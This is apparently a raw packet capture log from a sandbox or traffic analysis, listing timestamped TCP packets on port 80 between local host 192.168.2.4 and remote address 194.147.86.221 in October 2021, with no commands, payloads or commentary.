                                                          Oct 7, 2021 01:32:18.815713882 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815751076 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815790892 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815819979 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815829992 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815835953 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815865993 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815881014 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.815906048 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815943956 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815992117 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.815996885 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816034079 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816041946 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.816071987 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.816119909 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855792999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855822086 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855834961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855851889 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855871916 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855892897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855914116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855935097 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855957985 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.855964899 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.855981112 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856003046 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856023073 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.856045008 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.856071949 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865647078 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865691900 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865716934 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865776062 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865813971 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865833044 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865844011 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865869999 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865892887 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865926981 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.865928888 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865947008 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.865969896 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866008997 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866029024 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866065025 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866074085 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866094112 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866100073 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866125107 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866151094 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866163015 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866184950 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866206884 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866221905 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866266012 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866280079 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866290092 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866316080 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866329908 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866338968 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866360903 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866381884 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866383076 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866400003 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866420984 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866430044 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866442919 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866463900 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866485119 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866487026 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866508961 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866528034 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866528988 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866547108 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866588116 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866588116 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866611004 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866633892 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866643906 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866655111 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866668940 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.866678953 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.866731882 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905524015 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905652046 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905683041 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905710936 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905734062 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905756950 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905771971 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905788898 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905801058 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905812025 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905838966 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905863047 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905879974 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905885935 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905917883 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.905925035 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905947924 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.905977964 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916292906 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916331053 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916353941 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916379929 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916399002 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916404963 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916424990 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916434050 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916457891 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916471004 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916484118 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916508913 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916522026 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916533947 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916557074 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916558981 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916583061 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916604996 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916608095 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916635036 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916656017 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916661024 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916682959 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916706085 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916726112 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916727066 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916749954 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916755915 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916764021 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916778088 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916796923 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916807890 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916812897 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916835070 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916837931 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916853905 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916857004 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916871071 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916888952 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916888952 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.916904926 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:18.916944027 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:18.917934895 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.192461967 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.220047951 CEST4977680192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.241900921 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.242019892 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.242465973 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.268841982 CEST8049776194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.290623903 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.335150957 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.339643002 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.339732885 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.340179920 CEST4977880192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.433278084 CEST8049778194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686741114 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686785936 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686824083 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.686866045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687088013 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687247038 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.687779903 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687796116 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687798977 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.687869072 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688245058 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688307047 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.688653946 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.689049959 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.689062119 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743098974 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743216038 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743242025 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743273973 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743350983 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743380070 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743391991 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743405104 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743432045 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743514061 CEST4977780192.168.2.4194.147.86.221
                                                          Oct 7, 2021 01:32:19.743583918 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743693113 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743717909 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743750095 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743778944 CEST8049777194.147.86.221192.168.2.4
                                                          Oct 7, 2021 01:32:19.743791103 CEST4977780192.168.2.4194.147.86.221
Oct 7, 2021 01:32:19.743804932 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.743830919 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.743868113 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.743869066 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.743894100 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.743913889 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.743917942 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.743921041 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.743947029 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.744018078 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.792788982 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.792815924 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.792831898 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.792948961 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793009996 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793201923 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793204069 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793225050 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793241978 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793256998 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793272972 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793272972 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793287992 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793318033 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793323040 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793343067 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793517113 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793574095 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793607950 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793627024 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793663025 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793673038 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793689013 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793706894 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793710947 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793735027 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793756962 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793777943 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793797970 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793800116 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793803930 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793824911 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793828011 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793843985 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793874025 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793895960 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793916941 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793920040 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793945074 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793968916 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.793972015 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.793991089 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794013023 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794032097 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794097900 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794114113 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794138908 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794161081 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794182062 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794183016 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794203997 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794204950 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794255018 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794285059 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794301987 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794325113 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.794327974 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794395924 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.794410944 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.811055899 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811140060 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811191082 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811217070 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811242104 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811264992 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811290026 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811311960 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811336994 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.811336994 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.811384916 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.824913025 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.825069904 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.845808983 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845870972 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845904112 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845932961 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845937967 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.845963001 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845988989 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.845992088 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.845993996 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.845997095 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.846029997 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.846050978 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.846061945 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.846077919 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.846091032 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.846110106 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.846142054 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.860569000 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860635042 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860693932 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860694885 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.860742092 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860785007 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.860795975 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860836029 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860872984 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860904932 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.860910892 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860949039 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.860953093 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.860996008 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861037016 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861063957 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.861076117 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861115932 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861134052 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.861155987 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861191034 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861227989 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861238956 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.861265898 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861272097 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.861314058 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.861356020 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.874541044 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.874596119 CEST    80    49778    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.875806093 CEST    49778    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.895229101 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895261049 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895276070 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895299911 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895328045 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895355940 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895382881 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895384073 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.895411968 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895446062 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895477057 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895500898 CEST    49777    80    192.168.2.4    194.147.86.221
Oct 7, 2021 01:32:19.895504951 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895533085 CEST    80    49777    194.147.86.221    192.168.2.4
Oct 7, 2021 01:32:19.895554066 CEST    80    49777    194.147.86.221    192.168.2.4
